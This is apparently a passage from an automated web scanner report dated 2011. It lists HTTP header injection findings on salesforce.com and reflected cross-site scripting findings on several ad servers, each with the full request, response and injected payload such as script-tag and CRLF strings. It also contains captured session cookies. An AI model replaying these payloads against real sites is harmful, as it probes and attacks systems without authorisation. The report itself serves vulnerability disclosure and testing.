s_sess=%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B%20s_ppv%3D62%257C0%3B

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /def3f
f5e9ff33902
/
Date: Fri, 22 Apr 2011 15:29:58 GMT
Content-Length: 77

The URL has moved to <a href="/def3f
f5e9ff33902/">/def3f
f5e9ff33902/</a>

2.33. http://www.salesforce.com/platform [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /platform

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a3ace%0d%0a511c6f03f7c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a3ace%0d%0a511c6f03f7c?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://burp/show/2
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /a3ace
511c6f03f7c
/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
Date: Fri, 22 Apr 2011 15:25:34 GMT
Content-Length: 191

The URL has moved to <a href="/a3ace
511c6f03f7c/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1">/a3ace
511c6f03f7c/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1</a>

2.34. http://www.salesforce.com/platform/210x147_rotatingbanner.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /platform/210x147_rotatingbanner.swf

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 50940%0d%0a4462d617d22 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /platform/50940%0d%0a4462d617d22 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D; fsr.a=1303485892905; mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /platform/50940
4462d617d22
/
Date: Fri, 22 Apr 2011 15:27:56 GMT
Content-Length: 95

The URL has moved to <a href="/platform/50940
4462d617d22/">/platform/50940
4462d617d22/</a>

2.35. http://www.salesforce.com/platform/data/banner_rotation.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /platform/data/banner_rotation.xml

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 29460%0d%0a27690dcd73b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /platform/data/29460%0d%0a27690dcd73b HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/210x147_rotatingbanner.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_sess=%20s_ppv%3D0%3B%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B; fsr.a=1303485895322

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /platform/data/29460
27690dcd73b
/
Date: Fri, 22 Apr 2011 15:29:39 GMT
Content-Length: 105

The URL has moved to <a href="/platform/data/29460
27690dcd73b/">/platform/data/29460
27690dcd73b/</a>

3. Cross-site scripting (reflected)
There are 202 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://ad.doubleclick.net/adj/N3493.intergi.com/B5426713.10 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3493.intergi.com/B5426713.10

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53524'-alert(1)-'3d614a62ce1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3493.intergi.com/B5426713.10;sz=53524'-alert(1)-'3d614a62ce1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 51503
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 22 Apr 2011 15:41:05 GMT
Expires: Fri, 22 Apr 2011 15:41:05 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
g=1;v=1;pid=62588931;aid=240047740;ko=0;cid=41735219;rid=41753006;rv=1;rn=1924468;";
this.swfParams = 'ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&src=2059633&rv=1&rid=41753006&=53524'-alert(1)-'3d614a62ce1&';
this.renderingId = "41753006";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

3.2. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 828af<script>alert(1)</script>33df1d10383 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/684339828af<script>alert(1)</script>33df1d10383?d=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=uHyDGHbZ&did=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2Ki4yrDEsqEzLy6tJrDE0LKlS0lFKSszLSy3KBKtQqq0FAA%3D%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; vsd=0@1@4db0cb91@searchportal.information.com; rb=0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Fri, 22 Apr 2011 17:51:23 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/684339828af<script>alert(1)</script>33df1d10383

3.3. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85d63"><script>alert(1)</script>ab732276e99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe85d63"><script>alert(1)</script>ab732276e99/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn85d63"><script>alert(1)</script>ab732276e99/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group];adiframe=y">
...[SNIP]...

3.4. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0eb2"><script>alert(1)</script>aac0eaedd2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0f0eb2"><script>alert(1)</script>aac0eaedd2a/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0f0eb2"><script>alert(1)</script>aac0eaedd2a/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group];adiframe=y">
...[SNIP]...

3.5. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc4e"><script>alert(1)</script>33cec00506 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/52053fc4e"><script>alert(1)</script>33cec00506/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 369

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/52053fc4e"><script>alert(1)</script>33cec00506/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group];adiframe=y">
...[SNIP]...

3.6. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d80c0"><script>alert(1)</script>b217f28c29d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785959d80c0"><script>alert(1)</script>b217f28c29d/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785959d80c0"><script>alert(1)</script>b217f28c29d/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group];adiframe=y">
...[SNIP]...

3.7. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede19"><script>alert(1)</script>da26e51db9e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785959/0ede19"><script>alert(1)</script>da26e51db9e/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785959/0ede19"><script>alert(1)</script>da26e51db9e/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group];adiframe=y">
...[SNIP]...

3.8. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c230"><script>alert(1)</script>92df9fceeea was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785959/0/1706c230"><script>alert(1)</script>92df9fceeea/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785959/0/1706c230"><script>alert(1)</script>92df9fceeea/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group];adiframe=y">
...[SNIP]...

3.9. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c3f"><script>alert(1)</script>68d2fa0cf19 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785959/0/170/ADTECH34c3f"><script>alert(1)</script>68d2fa0cf19;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785959/0/170/ADTECH34c3f"><script>alert(1)</script>68d2fa0cf19;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group];adiframe=y">
...[SNIP]...

3.10. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e27a"><script>alert(1)</script>dac7ffab43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]&1e27a"><script>alert(1)</script>dac7ffab43=1 HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 372

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]&1e27a"><script>alert(1)</script>dac7ffab43=1;adiframe=y">
...[SNIP]...

3.11. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96362"><script>alert(1)</script>af6646d0ffc was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]96362"><script>alert(1)</script>af6646d0ffc HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]96362"><script>alert(1)</script>af6646d0ffc;adiframe=y">
...[SNIP]...

